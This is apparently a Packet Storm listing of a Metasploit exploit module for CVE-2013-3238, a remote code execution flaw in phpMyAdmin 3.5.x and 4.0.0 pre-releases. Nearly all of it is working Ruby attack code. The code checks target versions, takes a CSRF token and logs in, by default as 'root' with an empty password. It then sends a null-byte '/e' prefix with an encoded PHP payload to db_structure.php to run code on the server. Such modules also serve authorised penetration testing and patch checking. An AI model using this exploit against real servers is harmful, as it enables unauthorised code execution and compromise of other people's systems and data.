phpMyAdmin Authenticated Remote Code Execution

2013-04-2900:00:00
Janek Vind aka waraxe
packetstormsecurity.com
0.973 High
EPSS
Percentile
99.8%
JSON
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',  
'Description' => %q{  
This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's  
replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php  
This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.  
PHP versions > 5.4.6 are not vulnerable.  
},  
'Author' =>  
[  
'Janek "waraxe" Vind', # Discovery  
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2013-3238' ],  
[ 'PMASA', '2013-2'],  
[ 'waraxe', '2013-SA#103' ],  
[ 'EDB', '25003'],  
[ 'OSVDB', '92793'],  
[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],  
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]  
],  
'Privileged' => false,  
'Platform' => ['php'],  
'Arch' => ARCH_PHP,  
'Payload' =>  
{  
'BadChars' => "&\n=+%",  
# Clear out PMA's error handler so it doesn't lose its mind  
# and cause ENOMEM errors and segfaults in the destructor.  
'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"  
},  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Apr 25 2013'))  
  
register_options(  
[  
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),  
OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),  
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])  
], self.class)  
end  
  
def check  
begin  
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })  
rescue  
print_error("Unable to connect to server.")  
return CheckCode::Unknown  
end  
  
if res.code != 200  
print_error("Unable to query /js/messages.php")  
return CheckCode::Unknown  
end  
  
php_version = res['X-Powered-By']  
if php_version  
print_status("PHP Version: #{php_version}")  
if php_version =~ /PHP\/(\d)\.(\d)\.(\d)/  
if $1.to_i > 5  
return CheckCode::Safe  
else  
if $1.to_i == 5 and $2.to_i > 4  
return CheckCode::Safe  
else  
if $1.to_i == 5 and $2.to_i == 4 and $3.to_i > 6  
return CheckCode::Safe  
end  
end  
end  
end  
else  
print_status("Unknown PHP Version")  
end  
  
if res.body =~ /pmaversion = '(.*)';/  
print_status("phpMyAdmin version: #{$1}")  
case $1.downcase  
when '3.5.8.1', '4.0.0-rc3'  
return CheckCode::Safe  
when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'  
return CheckCode::Vulnerable  
else  
if $1.starts_with? '3.5.'  
return CheckCode::Vulnerable  
end  
  
return CheckCode::Unknown  
end  
end  
end  
  
def exploit  
uri = target_uri.path  
print_status("Grabbing CSRF token...")  
response = send_request_cgi({ 'uri' => uri})  
if response.nil?  
fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")  
end  
  
if (response.body !~ /"token"\s*value="([^"]*)"/)  
fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")  
else  
print_good("Retrieved token")  
end  
  
token = $1  
post = {  
'token' => token,  
'pma_username' => datastore['USERNAME'],  
'pma_password' => datastore['PASSWORD']  
}  
  
print_status("Authenticating...")  
  
login = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(uri, 'index.php'),  
'vars_post' => post  
})  
  
if login.nil?  
fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")  
end  
  
token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first  
  
cookies = login.get_cookies  
  
login_check = send_request_cgi({  
'uri' => normalize_uri(uri, 'index.php'),  
'vars_get' => { 'token' => token },  
'cookie' => cookies  
})  
  
if login_check.body =~ /Welcome to/  
fail_with(Exploit::Failure::NoAccess, "Authentication failed.")  
else  
print_good("Authentication successful")  
end  
  
db = rand_text_alpha(3+rand(3))  
exploit_result = send_request_cgi({  
'uri' => normalize_uri(uri, 'db_structure.php'),  
'method' => 'POST',  
'cookie' => cookies,  
'vars_post' => {  
'query_type' => 'replace_prefix_tbl',  
'db' => db,  
'selected[0]' => db,  
'token' => token,  
'from_prefix' => "/e\0",  
'to_prefix' => payload.encoded,  
'mult_btn' => 'Yes'  
}  
},1)  
end  
end  
  
`